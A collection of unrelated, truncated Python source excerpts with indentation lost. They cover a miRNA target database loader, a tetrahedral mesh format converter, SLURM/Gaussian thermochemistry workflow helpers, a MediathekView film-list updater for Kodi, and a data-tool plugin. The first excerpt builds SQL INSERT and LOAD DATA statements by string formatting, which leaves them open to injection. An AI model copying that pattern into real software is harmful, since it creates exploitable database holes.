query = """LOAD DATA LOCAL INFILE '%s' INTO TABLE %s (`mirna`, `sig`, `job`, `tag`, `way`, `gene_symbol`, `score`, `energy`, `mi_start`, `mi_end`, `utr_start`, `utr_end`, `match_len`, `identity`, `similarity`, `mir_seq`, `lines`, `utr_seq`);""" % (outFile, getConfig("datasets", "mirtargets"))
cursor.execute(query)
cnx.commit()
#clean
delete(miFile)
delete(outFile)
return (new_t, old_t, com_t, dif_t, sig)
def delete(filepath):
try:
from os import remove, path
except:
return 1
if path.isfile(filepath):
remove(filepath)
return 0
def recordMiRNAEdit(mirName, pos, chr, seed, seq, ot, nt, ct, sig, jobId):
try:
query = """INSERT INTO `mirediting` (`mirna`, `accession`, `edit_pos_raw`, `edit_pos_chr`, `event`, `role`, `sequence`, `old_t`, `new_t`, `com_t`, `sig`, `job`) VALUES ('%s', '%s', '%s', '%s', '%s', '%s', '%s', '%s', '%s', '%s', '%s', %s);""" % (mirName, mirbase.getmiRnaAcc(mirName), pos, chr, | |
#!/usr/bin/env python
# encoding: utf-8
"""
meshconvert.py
A script to convert between tetrahedral mesh formats.
Created by <NAME> (<EMAIL>) on 2006-12-07.
"""
import sys
import getopt
import os
help_message = \
'''
meshconvert.py - a script to convert between tetrahedral mesh formats.
Usage:
meshconvert.py [-s scale] input_file output_file
input_file the input tetrahedral (or trianglar surface) mesh file.
This file must be in one of the following formats:
.node - Jonathan Shewchuk's node file format.
.node files must be accompanied by a
.ele file that contains tetrahedra.
.mesh - NETGEN's tetrahedral mesh format.
.vmesh - GRUMMP's tetrahedral mesh format.
.tet - AIM@SHAPE repository's tetrahedral mesh format.
.off - A common surface mesh format. If the input file
is in .off format, only boundary triangles will
be read and available for output.
.surf - NETGEN's triangle surface mesh format. If the
input file is in .surf format, only boundary
triangles will be read and available for output.
output_file the output tetrahedral (or triangular surface) mesh file.
This file must be in one of the following formats:
.node - Jonathan Shewchuk's mesh file format.
An additional .ele file will also be
output that contains tetrahedra.
.mesh - NETGEN's tetrahedral mesh format.
.obj - A common surface mesh format. If the output
file is in .obj format, only boundary triangles
will be written to it.
.off - A common surface mesh format. If the output
file is in .off format, only boundary triangles
will be written to it.
.surf - NETGEN's tetrahedral mesh format. If the output
file is in .surf format, only boundary triangles
will be written to it.
-s scale optional vertex scale argument. All vertices geometric positions
will be multiplied by scale in the output file.
NOTE: As part of the conversion process, all tetrahedra will be adjusted to have
consistent, right-handed orientation: That is, for a tetrahedron with vertices
ordered (1, 2, 3, 4), the vertices 2, 3, 4 occur in counterclockwise order as
seen from vertex 1. If you curl the fingers of your right hand to follow the
vertices 2, 3, 4, then your thumb points toward vertex 1.
'''
class Usage(Exception):
def __init__(self, msg):
self.msg = msg
def main(argv=None):
# functions for reading
readDict = {}
readDict['.node'] = readNodeEle
readDict['.mesh'] = readMesh
readDict['.vmesh'] = readVmesh
readDict['.tet'] = readTet
readDict['.surf'] = readSurfTets
readDict['.off'] = ReadOFFTets
# functions for writing
writeDict = {}
writeDict['.node'] = writeNodeEle
writeDict['.mesh'] = writeMesh
writeDict['.obj'] = writeOBJTets
writeDict['.off'] = writeOFFTets
writeDict['.surf'] = writeSurfTets
if argv is None:
argv = sys.argv
doscale = False
# if they invoke with arguments, parse them
if len(argv) > 1:
try:
try:
opts, args = getopt.getopt(argv[1:], "hs:", ["help",])
except getopt.error, msg:
raise Usage(msg)
# option processing
for option, value in opts:
if option == "-s":
doscale = True
scale = float(value)
if option in ("-h", "--help"):
print help_message
return 1
except Usage, err:
print >> sys.stderr, sys.argv[0].split("/")[-1] + ": " + str(err.msg)
print >> sys.stderr, "\t for help use --help"
return 2
else:
print help_message
return 1
if len(argv) < 3:
print "Not enough arguments. For help, use --help."
# determine the input and output formats, and check that they make sense
inFileName = argv[-2]
outFileName = argv[-1]
inFileNameBase, inType = os.path.splitext(inFileName)
outFileNameBase, outType = os.path.splitext(outFileName)
if inType not in readDict.keys():
print "Don't know how to read input format '%s'; invoke with --help for a list of supported formats." % (inType)
return 2
if outType not in writeDict.keys():
print "Don't know how to write output format '%s'; invoke with --help for a list of supported formats." % (outType)
return 2
# read the input mesh
points, tets, boundFaces = readDict[inType](inFileNameBase)
if doscale:
print "Scaling vertices by %g", scale
points = [vscale(scale, point) for point in points]
# write the output mesh
writeDict[outType](points, tets, boundFaces, outFileNameBase)
####
# Functions to READ tet mesh formats
####
def readTet(meshFileName):
"""Read .tet format... I don't actually remember who uses this"""
# append .mesh to file stem
meshFileName += '.tet'
# open input .tet file
infile = open(meshFileName)
# fetch the number of points
numpoints = int(infile.readline().split()[0])
# fetch the number of tets
numtets = int(infile.readline().split()[0])
points = []
# read in all the points
for iter in range(0,numpoints):
points.append(map(float,infile.readline().strip().split()))
tets = []
# read in the tets
for iter in range(0,numtets):
tets.append(vaddscalar(1,map(int,infile.readline().strip().split()[1:])))
# correct orientation of tets
for tetNum, tet in enumerate(tets):
a = points[tet[0]-1]
b = points[tet[1]-1]
c = points[tet[2]-1]
d = points[tet[3]-1]
# if tet is negative orientation, flip two verts
if orient3d(a,b,c,d) == 0:
print "WHOA! input zero-volume tet...\n"
if orient3d(a,b,c,d) < 0:
temp = tet[0]
tets[tetNum][0] = tet[1]
tets[tetNum][1] = temp
# this function doesn't attempt to recover boundary faces
boundFaces = []
infile.close()
return points, tets, boundFaces
def readMesh(meshFileName):
"""Read .mesh files, as output by NETGEN"""
# append .mesh to file stem
meshFileName += '.mesh'
# open input .mesh file
infile = open(meshFileName)
# fetch the number of points
numpoints = int(infile.readline())
points = []
# read in all the points
for iter in range(0,numpoints):
points.append(map(float,infile.readline().strip().split()))
# fetch the number of tets
numtets = int(infile.readline())
tets = []
# read in the tets
for iter in range(0,numtets):
tets.append(map(int,infile.readline().strip().split()[1:]))
# correct orientation of tets
for tetNum, tet in enumerate(tets):
a = points[tet[0]-1]
b = points[tet[1]-1]
c = points[tet[2]-1]
d = points[tet[3]-1]
# if tet is negative orientation, flip two verts
if orient3d(a,b,c,d) == 0:
print "WHOA! input zero-volume tet...\n"
sys.exit(1)
if orient3d(a,b,c,d) < 0:
temp = tet[0]
tets[tetNum][0] = tet[1]
tets[tetNum][1] = temp
# fetch the number of boundary faces
numfaces = int(infile.readline())
boundFaces = []
# read in the boundary faces
for iter in range(0,numfaces):
boundFaces.append(map(int,infile.readline().strip().split()[1:]))
infile.close()
# fix tets to reference points starting at 0
for index, tet in enumerate(tets):
tets[index] = vsubscalar(1,tet)
return points, tets, boundFaces
def readVmesh(meshFileName):
"""Read in .vmesh file... again, I can't recall who uses this format"""
# append .vmesh to file stem
meshFileName += '.vmesh'
# open input .vmesh file
infile = open(meshFileName)
# first line: #tets #faces #boundFaces #verts
firstLine = map(int,infile.readline().strip().split())
numTets = firstLine[0]
numFaces = firstLine[1]
numBoundFaces = firstLine[2]
numPoints = firstLine[3]
points = []
# read in all the points
for iter in range(0,numPoints):
points.append(map(float,infile.readline().strip().split()))
faces = []
face2tet = []
for iter in range(0,numFaces):
line = map(int,infile.readline().strip().split())
face2tet.append(line[0:2])
faces.append(line[2:])
boundFaces = []
for iter in range(0,numBoundFaces):
boundFaces.append(map(int,infile.readline().strip().split()[2:]))
boundFaces[-1][0] = boundFaces[-1][0] + 1
boundFaces[-1][1] = boundFaces[-1][1] + 1
boundFaces[-1][2] = boundFaces[-1][2] + 1
boundFaces[-1].reverse()
tets = [[]] * numTets
mintet = 100
maxtet = 0
# reconstruct tets from face and face2tet information
# for each face
for faceNum, face in enumerate(faces):
# for each vertex in the face
for vert in face:
# for each tet that has this face
for tetNum in face2tet[faceNum]:
# if this is a legit tet index
if tetNum >= 0:
# use tetNum - 1 because .vmesh starts with tet 1
if (vert+1 in tets[tetNum]) == False:
tets[tetNum] = tets[tetNum] + [vert+1]
# correct orientation of tets
for tetNum, tet in enumerate(tets):
a = points[tet[0]-1]
b = points[tet[1]-1]
c = points[tet[2]-1]
d = points[tet[3]-1]
# if tet is negative orientation, flip two verts
if orient3d(a,b,c,d) == 0:
print "WHOA! input zero-volume tet...\n"
if orient3d(a,b,c,d) < 0:
temp = tet[0]
tets[tetNum][0] = tet[1]
tets[tetNum][1] = temp
return points, tets, boundFaces
def readNodeEle(filename, computeTopo=True):
"""Read a tetrahedral mesh in .node/.ele format, <NAME> format.
The .node file specifies the vertex locations and the .ele format specfies
the tetrahedra. The .node file might start with an index of one or zero."""
points, startFromZero = ReadNode(filename)
tets = ReadEle(filename, startFromZero)
# correct orientation of tets
for tetNum, tet in enumerate(tets):
a = points[tet[0]]
b = points[tet[1]]
c = points[tet[2]]
d = points[tet[3]]
# if tet is negative orientation, flip two verts
if orient3d(a,b,c,d) == 0.0:
print | |
<reponame>sevyharris/autoscience_workflow
# Functions for running a thermo job using this workflow
import pandas as pd
import os
import sys
import glob
import datetime
import time
import subprocess
import job_manager
try:
DFT_DIR = os.environ['DFT_DIR']
except KeyError:
DFT_DIR = '/work/westgroup/harris.se/autoscience/autoscience_workflow/results/dft'
def get_num_species():
"""Function to lookup number of species in the species_list.csv
"""
species_csv = os.path.join(DFT_DIR, '..', '..', 'resources', 'species_list.csv')
species_df = pd.read_csv(species_csv)
return species_df.i.values[-1]
def index2smiles(species_index):
"""Function to return species smiles given a species index
looks up the results in the species_list.csv
"""
species_csv = os.path.join(DFT_DIR, '..', '..', 'resources', 'species_list.csv')
species_df = pd.read_csv(species_csv)
species_smiles = species_df.SMILES.values[species_index]
return species_smiles
def arkane_complete(species_index):
"""Function to check whether the arkane job is complete for a species
Expects to find the following directory structure:
DFT_DIR/thermo/species_XXXX/arkane/RMG_libraries/thermo.py
Returns True if complete, False otherwise
"""
species_dir = os.path.join(DFT_DIR, 'thermo', f'species_{species_index:04}')
arkane_result = os.path.join(species_dir, 'arkane', 'RMG_libraries', 'thermo.py')
return os.path.exists(arkane_result)
def termination_status(log_file):
"""Returns:
0 for Normal termination
1 for Error termination
-1 for no termination
"""
with open(log_file, 'rb') as f:
f.seek(0, os.SEEK_END)
normal_termination = False
error_termination = False
for i in range(0, 5):
try:
f.seek(-2, os.SEEK_CUR)
while f.read(1) != b'\n':
f.seek(-2, os.SEEK_CUR)
except OSError:
f.seek(0)
saved_position = f.tell()
last_line = f.readline().decode()
f.seek(saved_position, os.SEEK_SET)
if 'Normal termination' in last_line:
return 0
elif 'Error termination' in last_line:
return 1
return -1
def get_n_runs(slurm_array_file):
"""Reads the run.sh file to figure out how many conformers or rotors were meant to run
"""
with open(slurm_array_file, 'r') as f:
for line in f:
if 'SBATCH --array=' in line:
token = line.split('-')[-1]
n_runs = 1 + int(token.split('%')[0])
return n_runs
return 0
def incomplete_conformers(species_index):
"""Returns a list of indices of incomplete conformers that need to be rerun
count 'Error termination' as well as 'normal termination'
Does not work on restart.sh, which has ','
"""
conformer_dir = os.path.join(DFT_DIR, 'thermo', f'species_{species_index:04}', 'conformers')
# Get #conformers from the array job script
slurm_array_file = os.path.join(conformer_dir, 'run.sh')
if not os.path.exists(slurm_array_file):
return True # no conformers run yet
n_conformers = get_n_runs(slurm_array_file)
incomplete_cfs = []
for cf_index in range(0, n_conformers):
conformer_file = os.path.join(conformer_dir, f'conformer_{cf_index:04}.log')
if not os.path.exists(conformer_file):
incomplete_cfs.append(cf_index)
continue
status = termination_status(conformer_file)
if status == -1:
incomplete_cfs.append(cf_index)
return incomplete_cfs
def incomplete_rotors(species_index):
"""Returns a list of indices of incomplete rotors that need to be rerun
count 'Error termination' as well as 'normal termination'
Does not work on restart.sh, which has ','
"""
rotor_dir = os.path.join(DFT_DIR, 'thermo', f'species_{species_index:04}', 'rotors')
# Get #rotors from the array job script
slurm_array_file = os.path.join(rotor_dir, 'run.sh')
if not os.path.exists(slurm_array_file):
return True # no rotors run yet
n_rotors = get_n_runs(slurm_array_file)
incomplete_rs = []
for r_index in range(0, n_rotors):
rotor_file = os.path.join(rotor_dir, f'rotor_{r_index:04}.log')
if not os.path.exists(rotor_file):
incomplete_rs.append(r_index)
continue
status = termination_status(rotor_file)
if status == -1:
incomplete_rs.append(r_index)
return incomplete_rs
def conformers_complete(species_index):
"""Function to check whether all of the Gaussian conformer jobs have finished running.
Looks at the run.sh script to find the highest conformer index, then searches each .log file
for Normal termination
"""
if incomplete_conformers(species_index):
return False
return True
def rotors_complete(species_index):
"""Function to check whether all of the Gaussian rotor jobs have finished running.
Looks at the run.sh script to find the highest rotor index, then searches each .log file
for Normal termination
"""
if incomplete_rotors(species_index):
return False
return True
def restart_conformers(species_index):
"""Function to rerun the conformers that didn't converge in time
"""
# create a new slurm job file to run on west partition, 10 at a time, 2 week max
missing_conformers = incomplete_conformers(species_index)
missing_conformers_str = [str(i) for i in missing_conformers]
indices_str = ','.join(missing_conformers_str)
species_dir = os.path.join(DFT_DIR, 'thermo', f'species_{species_index:04}')
conformer_dir = os.path.join(species_dir, 'conformers')
# TODO put restart in the gaussian job file
slurm_run_file = os.path.join(conformer_dir, 'restart.sh')
slurm_settings = {
'--job-name': f'g16_cf_{species_index}',
'--error': 'error.log',
'--nodes': 1,
'--partition': 'west',
'--exclude': 'c5003',
'--mem': '20Gb',
'--time': '14-00:00:00',
'--cpus-per-task': 16,
'--array': f'{indices_str}%10',
}
slurm_file_writer = job_manager.SlurmJobFile(full_path=slurm_run_file)
slurm_file_writer.settings = slurm_settings
slurm_file_writer.content = [
'export GAUSS_SCRDIR=/scratch/harris.se/guassian_scratch\n',
'mkdir -p $GAUSS_SCRDIR\n',
'module load gaussian/g16\n',
'source /shared/centos7/gaussian/g16/bsd/g16.profile\n\n',
'RUN_i=$(printf "%04.0f" $(($SLURM_ARRAY_TASK_ID)))\n',
'fname="conformer_${RUN_i}.com"\n\n',
'g16 $fname\n',
]
slurm_file_writer.write_file()
# copy the file and add a restart? this is so messy, but I'm gonna do it
for cf_idx in missing_conformers:
pass
# TODO see if conditions are right to restart in Gaussian:
# chk file exists
# previous run made it at least one step in the optimization
# restart the conformers
# submit the job
start_dir = os.getcwd()
os.chdir(conformer_dir)
gaussian_conformers_job = job_manager.SlurmJob()
slurm_cmd = f"sbatch {slurm_run_file}"
gaussian_conformers_job.submit(slurm_cmd)
os.chdir(start_dir)
gaussian_conformers_job.wait_all(check_interval=600)
def restart_rotors(species_index):
"""Function to rerun the conformers that didn't converge in time
"""
# create a new slurm job file to run on west partition, 10 at a time, 2 week max
missing_rotors = incomplete_rotors(species_index)
missing_rotors_str = [str(i) for i in missing_rotors]
indices_str = ','.join(missing_rotors_str)
species_dir = os.path.join(DFT_DIR, 'thermo', f'species_{species_index:04}')
rotor_dir = os.path.join(species_dir, 'rotors')
# TODO put restart in the gaussian job file
slurm_run_file = os.path.join(rotor_dir, 'restart.sh')
slurm_settings = {
'--job-name': f'g16_rotor_{species_index}',
'--error': 'error.log',
'--nodes': 1,
'--partition': 'west',
'--exclude': 'c5003',
'--mem': '20Gb',
'--time': '14-00:00:00',
'--cpus-per-task': 16,
'--array': f'{indices_str}%10',
}
slurm_file_writer = job_manager.SlurmJobFile(full_path=slurm_run_file)
slurm_file_writer.settings = slurm_settings
slurm_file_writer.content = [
'export GAUSS_SCRDIR=/scratch/harris.se/guassian_scratch\n',
'mkdir -p $GAUSS_SCRDIR\n',
'module load gaussian/g16\n',
'source /shared/centos7/gaussian/g16/bsd/g16.profile\n\n',
'RUN_i=$(printf "%04.0f" $(($SLURM_ARRAY_TASK_ID)))\n',
'fname="rotor_${RUN_i}.com"\n\n',
'g16 $fname\n',
]
slurm_file_writer.write_file()
# submit the job
start_dir = os.getcwd()
os.chdir(rotor_dir)
gaussian_rotors_job = job_manager.SlurmJob()
slurm_cmd = f"sbatch {slurm_run_file}"
gaussian_rotors_job.submit(slurm_cmd)
os.chdir(start_dir)
gaussian_rotors_job.wait_all(check_interval=600)
def run_conformers_job(species_index):
"""Function to call snakemake rule to run conformers
This function waits until all SLURM jobs are done, so it could take days
"""
species_dir = os.path.join(DFT_DIR, 'thermo', f'species_{species_index:04}')
conformer_dir = os.path.join(species_dir, 'conformers')
os.makedirs(conformer_dir, exist_ok=True)
logfile = os.path.join(conformer_dir, 'conformers.log')
start = time.time()
timestamp = datetime.datetime.now()
with open(logfile, 'a') as f:
f.write(f'Starting conformers job: {timestamp}' + '\n')
# check if the run was already completed
if conformers_complete(species_index):
print('Conformers already ran')
with open(logfile, 'a') as f:
f.write('Conformers already ran\n')
return True
workflow_dir = os.path.join(DFT_DIR, '..', '..', 'workflow')
# start a job that calls snakemake to run conformers
os.chdir(workflow_dir)
conformer_cmd = f'snakemake -c1 species_thermo --config species_index={species_index}'
print(f'Running {conformer_cmd}')
cmd_pieces = conformer_cmd.split()
proc = subprocess.Popen(cmd_pieces)
print(proc)
# RUN HOTBIT
time.sleep(300)
g16_job_number = ''
# look for the hotbit slurm file
hotbit_slurm = glob.glob(os.path.join(species_dir, 'slurm-*'))
if len(hotbit_slurm) == 0:
print('Hotbit slurm file not found. Hotbit did not start.')
exit(3)
hotbit_complete = False
while not hotbit_complete:
with open(hotbit_slurm[0], 'r') as f:
lines = f.readlines()
for line in lines:
if 'Submitted batch job' in line:
hotbit_complete = True
g16_job_number = line.split()[-1]
break
time.sleep(300) # This wait is to make sure the job is on the SLURM queue
print('Hotbit conformer screening complete')
with open(logfile, 'a') as f:
f.write('Hotbit conformer screening complete\n')
# wait 10 minutes for the conformer jobs to finish
gaussian_job = job_manager.SlurmJob()
gaussian_job.job_id = g16_job_number
print(f'Waiting on job {gaussian_job}')
with open(logfile, 'a') as f:
f.write(f'Waiting on job {g16_job_number}' + '\n')
gaussian_job.wait_all(check_interval=600)
# rerun any conformer jobs that failed to converge in time:
if not conformers_complete(species_index):
with open(logfile, 'a') as f:
f.write('Setting up conformer restart job\n')
restart_conformers(species_index) # this waits for jobs to finish
if not conformers_complete(species_index):
with open(logfile, 'a') as f:
f.write('Conformer restart failed\n')
return False
end = time.time()
duration = end - start
print(f'Gaussian conformer jobs completed in {duration} seconds' + '\n')
with open(logfile, 'a') as f:
f.write(f'Gaussian conformer jobs completed in {duration} seconds' + '\n')
return True
def read_gaussian_energy(logfile):
with open(logfile, 'r') as f:
for line in f:
if 'Sum of electronic and zero-point Energies= ' in line:
energy = float(line.split()[-1])
return energy
return 0
def get_lowest_conformer(species_index):
"""Returns the filepath of the lowest energy conformer logfile
"""
conformer_dir = os.path.join(DFT_DIR, 'thermo', f'species_{species_index:04}', 'conformers')
slurm_array_file = os.path.join(conformer_dir, 'run.sh')
if not os.path.exists(slurm_array_file):
return None # no conformers run yet
n_conformers = get_n_runs(slurm_array_file)
lowest_energy = 999999
best_conformer_file = None
for cf_index in range(0, n_conformers):
conformer_file = os.path.join(conformer_dir, f'conformer_{cf_index:04}.log')
status = termination_status(conformer_file)
if status != 0:
continue
energy = read_gaussian_energy(conformer_file)
print(cf_index, energy)
if energy < lowest_energy:
lowest_energy = energy
best_conformer_file = conformer_file
return best_conformer_file
def run_rotors_job(species_index):
# start a job that calls snakemake to run rotors
species_dir = os.path.join(DFT_DIR, 'thermo', f'species_{species_index:04}')
rotor_dir = os.path.join(species_dir, 'rotors')
os.makedirs(rotor_dir, exist_ok=True)
logfile = os.path.join(rotor_dir, 'rotors.log')
start = time.time()
timestamp = datetime.datetime.now()
with open(logfile, 'a') as f:
f.write(f'Starting rotors job: {timestamp}' + '\n')
# check if a rotor job was already completed
| |
<gh_stars>0
# -*- coding: utf-8 -*-
"""
The database updater module
Copyright 2017-2019, <NAME> and <NAME>
"""
# -- Imports ------------------------------------------------
import os
import time
import datetime
import subprocess
# pylint: disable=import-error
try:
# Python 3.x
from urllib.error import URLError
except ImportError:
# Python 2.x
from urllib2 import URLError
from contextlib import closing
import ijson
import resources.lib.mvutils as mvutils
# from resources.lib.utils import *
from resources.lib.store import Store
from resources.lib.exceptions import DatabaseCorrupted
from resources.lib.exceptions import DatabaseLost
from resources.lib.exceptions import ExitRequested
# -- Unpacker support ---------------------------------------
UPD_CAN_BZ2 = False
UPD_CAN_GZ = False
try:
import bz2
UPD_CAN_BZ2 = True
except ImportError:
pass
try:
import gzip
UPD_CAN_GZ = True
except ImportError:
pass
# -- Constants ----------------------------------------------
FILMLISTE_URL = 'https://liste.mediathekview.de/'
FILMLISTE_AKT = 'Filmliste-akt'
FILMLISTE_DIF = 'Filmliste-diff'
# -- Classes ------------------------------------------------
# pylint: disable=bad-whitespace
class MediathekViewUpdater(object):
""" The database updator class """
def __init__(self, logger, notifier, settings, monitor=None):
self.logger = logger
self.notifier = notifier
self.settings = settings
self.monitor = monitor
self.database = None
self.use_xz = mvutils.find_xz() is not None
self.cycle = 0
self.add_chn = 0
self.add_shw = 0
self.add_mov = 0
self.del_chn = 0
self.del_shw = 0
self.del_mov = 0
self.tot_chn = 0
self.tot_shw = 0
self.tot_mov = 0
self.index = 0
self.count = 0
self.film = {}
def init(self, convert=False):
""" Initializes the updater """
if self.database is not None:
self.exit()
self.database = Store(self.logger, self.notifier, self.settings)
self.database.init(convert=convert)
def exit(self):
""" Resets the updater """
if self.database is not None:
self.database.exit()
del self.database
self.database = None
def reload(self):
""" Reloads the updater """
self.exit()
self.init()
def is_enabled(self):
""" Returns if the updater is enabled """
return self.settings.updenabled
def get_current_update_operation(self, force=False, full=False):
"""
Determines which update operation should be done. Returns
one of these values:
0 - no update operation pending
1 - full update
2 - differential update
Args:
force(bool, optional): if `True` a full update
is always returned. Default is `False`
full(book, optional): if `True` a full update
is always returned. Default is `False`
"""
if self.database is None:
# db not available - no update
self.logger.info('Update disabled since database not available')
return 0
elif self.settings.updmode == 0:
# update disabled - no update
return 0
elif self.settings.updmode == 1 or self.settings.updmode == 2:
# manual update or update on first start
if self.settings.is_update_triggered() is True:
return self._get_next_update_operation(True, False)
else:
# no update on all subsequent calls
return 0
elif self.settings.updmode == 3:
# automatic update
if self.settings.is_user_alive():
return self._get_next_update_operation(force, full)
else:
# no update if user is idle for more than 2 hours
return 0
elif self.settings.updmode == 4:
# continous update
return self._get_next_update_operation(force, full)
def _get_next_update_operation(self, force=False, full=False):
status = self.database.get_status()
tsnow = int(time.time())
tsold = status['lastupdate']
dtnow = datetime.datetime.fromtimestamp(tsnow).date()
dtold = datetime.datetime.fromtimestamp(tsold).date()
if status['status'] == 'UNINIT':
# database not initialized - no update
self.logger.debug('database not initialized')
return 0
elif status['status'] == "UPDATING" and tsnow - tsold > 10800:
# process was probably killed during update - no update
self.logger.info(
'Stuck update pretending to run since epoch {} reset', tsold)
self.database.update_status('ABORTED')
return 0
elif status['status'] == "UPDATING":
# already updating - no update
self.logger.debug('Already updating')
return 0
elif not full and not force and tsnow - tsold < self.settings.updinterval:
# last update less than the configured update interval - no update
self.logger.debug(
'Last update less than the configured update interval. do nothing')
return 0
elif dtnow != dtold:
# last update was not today. do full update once a day
self.logger.debug(
'Last update was not today. do full update once a day')
return 1
elif status['status'] == "ABORTED" and status['fullupdate'] == 1:
# last full update was aborted - full update needed
self.logger.debug(
'Last full update was aborted - full update needed')
return 1
elif full is True:
# full update requested
self.logger.info('Full update requested')
return 1
else:
# do differential update
self.logger.debug('Do differential update')
return 2
def update(self, full):
"""
Downloads the database update file and
then performs a database update
Args:
full(bool): Perform full update if `True`
"""
if self.database is None:
return
elif self.database.supports_native_update(full):
if self.get_newest_list(full):
if self.database.native_update(full):
self.cycle += 1
self.delete_list(full)
elif self.database.supports_update():
if self.get_newest_list(full):
if self.import_database(full):
self.cycle += 1
self.delete_list(full)
def import_database(self, full):
"""
Performs a database update when a
downloaded update file is available
Args:
full(bool): Perform full update if `True`
"""
(_, _, destfile, avgrecsize) = self._get_update_info(full)
if not mvutils.file_exists(destfile):
self.logger.error('File {} does not exists', destfile)
return False
# estimate number of records in update file
records = int(mvutils.file_size(destfile) / avgrecsize)
if not self.database.ft_init():
self.logger.warn(
'Failed to initialize update. Maybe a concurrency problem?')
return False
# pylint: disable=broad-except
try:
starttime = time.time()
self.logger.info(
'Starting import of approx. {} records from {}', records, destfile)
with closing(open(destfile, 'r')) as updatefile:
parser = ijson.parse(updatefile)
flsm = 0
flts = 0
(self.tot_chn, self.tot_shw, self.tot_mov) = self._update_start(full)
self.notifier.show_update_progress()
for prefix, event, value in parser:
if (prefix, event) == ("X", "start_array"):
self._init_record()
elif (prefix, event) == ("X", "end_array"):
self._end_record(records)
if self.count % 100 == 0 and self.monitor.abort_requested():
# kodi is shutting down. Close all
self._update_end(full, 'ABORTED')
self.notifier.close_update_progress()
return True
elif (prefix, event) == ("X.item", "string"):
if value is not None:
# self._add_value( value.strip().encode('utf-8') )
self._add_value(value.strip())
else:
self._add_value("")
elif (prefix, event) == ("Filmliste", "start_array"):
flsm += 1
elif (prefix, event) == ("Filmliste.item", "string"):
flsm += 1
if flsm == 2 and value is not None:
# this is the timestmap of this database update
try:
fldt = datetime.datetime.strptime(
value.strip(), "%d.%m.%Y, %H:%M")
flts = int(time.mktime(fldt.timetuple()))
self.database.update_status(filmupdate=flts)
self.logger.info(
'Filmliste dated {}', value.strip())
except TypeError:
# pylint: disable=line-too-long
# SEE: https://forum.kodi.tv/showthread.php?tid=112916&pid=1214507#pid1214507
# Wonderful. His name is also Leopold
try:
flts = int(time.mktime(time.strptime(
value.strip(), "%d.%m.%Y, %H:%M")))
self.database.update_status(
filmupdate=flts)
self.logger.info(
'Filmliste dated {}', value.strip())
# pylint: disable=broad-except
except Exception as err:
# If the universe hates us...
self.logger.debug(
'Could not determine date "{}" of filmliste: {}', value.strip(), err)
except ValueError as err:
pass
self._update_end(full, 'IDLE')
self.logger.info(
'Import of {} in update cycle {} finished. Duration: {} seconds',
destfile,
self.cycle,
int(time.time() - starttime)
)
self.notifier.close_update_progress()
return True
except KeyboardInterrupt:
self._update_end(full, 'ABORTED')
self.logger.info('Update cycle {} interrupted by user', self.cycle)
self.notifier.close_update_progress()
return False
except DatabaseCorrupted as err:
self.logger.error('{} on update cycle {}', err, self.cycle)
self.notifier.close_update_progress()
except DatabaseLost as err:
self.logger.error('{} on update cycle {}', err, self.cycle)
self.notifier.close_update_progress()
except Exception as err:
self.logger.error(
'Error {} while processing {} on update cycle {}', err, destfile, self.cycle)
self._update_end(full, 'ABORTED')
self.notifier.close_update_progress()
return False
def get_newest_list(self, full):
"""
Downloads the database update file
Args:
full(bool): Downloads the full list if `True`
"""
(url, compfile, destfile, _) = self._get_update_info(full)
if url is None:
self.logger.error(
'No suitable archive extractor available for this system')
self.notifier.show_missing_extractor_error()
return False
# cleanup downloads
self.logger.info('Cleaning up old downloads...')
mvutils.file_remove(compfile)
mvutils.file_remove(destfile)
# download filmliste
self.notifier.show_download_progress()
# pylint: disable=broad-except
try:
self.logger.info('Trying to download {} from {}...',
os.path.basename(compfile), url)
self.notifier.update_download_progress(0, url)
mvutils.url_retrieve(
url,
filename=compfile,
reporthook=self.notifier.hook_download_progress,
aborthook=self.monitor.abort_requested
)
except URLError as err:
self.logger.error('Failure downloading {} - {}', url, err)
self.notifier.close_download_progress()
self.notifier.show_download_error(url, err)
return False
except ExitRequested as err:
self.logger.error(
'Immediate exit requested. Aborting download of {}', url)
self.notifier.close_download_progress()
self.notifier.show_download_error(url, err)
return False
except Exception as err:
self.logger.error('Failure writng {}', url)
self.notifier.close_download_progress()
self.notifier.show_download_error(url, err)
return False
# decompress filmliste
if self.use_xz is True:
self.logger.info('Trying to decompress xz file...')
retval = subprocess.call([mvutils.find_xz(), '-d', compfile])
self.logger.info('Return {}', retval)
elif UPD_CAN_BZ2 is True:
self.logger.info('Trying to decompress bz2 file...')
retval = self._decompress_bz2(compfile, destfile)
self.logger.info('Return {}', retval)
elif UPD_CAN_GZ is True:
self.logger.info('Trying to decompress gz file...')
retval = self._decompress_gz(compfile, destfile)
self.logger.info('Return {}', retval)
else:
# should never reach
pass
self.notifier.close_download_progress()
return retval == 0 and mvutils.file_exists(destfile)
def delete_list(self, full):
"""
Deletes locally stored database update files
Args:
full(bool): Deletes the full lists if `True`
"""
(_, compfile, destfile, _) = self._get_update_info(full)
self.logger.info('Cleaning up downloads...')
mvutils.file_remove(compfile)
mvutils.file_remove(destfile)
def _get_update_info(self, full):
if self.use_xz is True:
ext = '.xz'
elif UPD_CAN_BZ2 is True:
ext = '.bz2'
elif UPD_CAN_GZ is True:
ext = '.gz'
else:
return (None, None, None, 0, )
info = self.database.get_native_info(full)
if info is not None:
return (
self._get_update_url(info[0]),
os.path.join(self.settings.datapath, info[1] + ext),
os.path.join(self.settings.datapath, info[1]),
500
)
if full:
return (
FILMLISTE_URL + FILMLISTE_AKT + ext,
os.path.join(self.settings.datapath, FILMLISTE_AKT + ext),
os.path.join(self.settings.datapath, FILMLISTE_AKT),
600,
)
else:
return (
FILMLISTE_URL + | |
= {
'list': self.ToolMode.LIST_FILES,
'download_file': self.ToolMode.DOWNLOAD_TO_PATH,
'download_blob': self.ToolMode.DOWNLOAD_TO_BLOB
}.get(self._prep_xmltext(xml, 'ToolMode'), self.ToolMode.NONE_MODE)
# File Handling
self.file_handling = {
'keep_files': self.FileHandling.KEEP_FILES,
'delete_files': self.FileHandling.DELETE_FILES,
'move_files': self.FileHandling.MOVE_FILES
}.get(self._prep_xmltext(xml, 'FileHandling'), self.FileHandling.NONE_HANDLING)
# Output Settings
if self.tool_mode == self.ToolMode.DOWNLOAD_TO_PATH:
self.output_settings['local_path'] = self._prep_xmltext(xml, 'LocalPath')
self.output_settings['local_path'] = os.path.join(self.output_settings['local_path'], "")
else:
self.output_settings['local_path'] = None
# Incoming Settings
self.incoming_field = self._prep_xmltext(xml, 'IncomingField')
# Validate settings
self.validate_settings()
# Get Output anchors
self.output_anchor = self.output_anchor_mgr.get_output_anchor('Output')
def pi_add_incoming_connection(self, str_type: str, str_name: str) -> object:
"""
The IncomingInterface objects are instantiated here, one object per incoming connection.
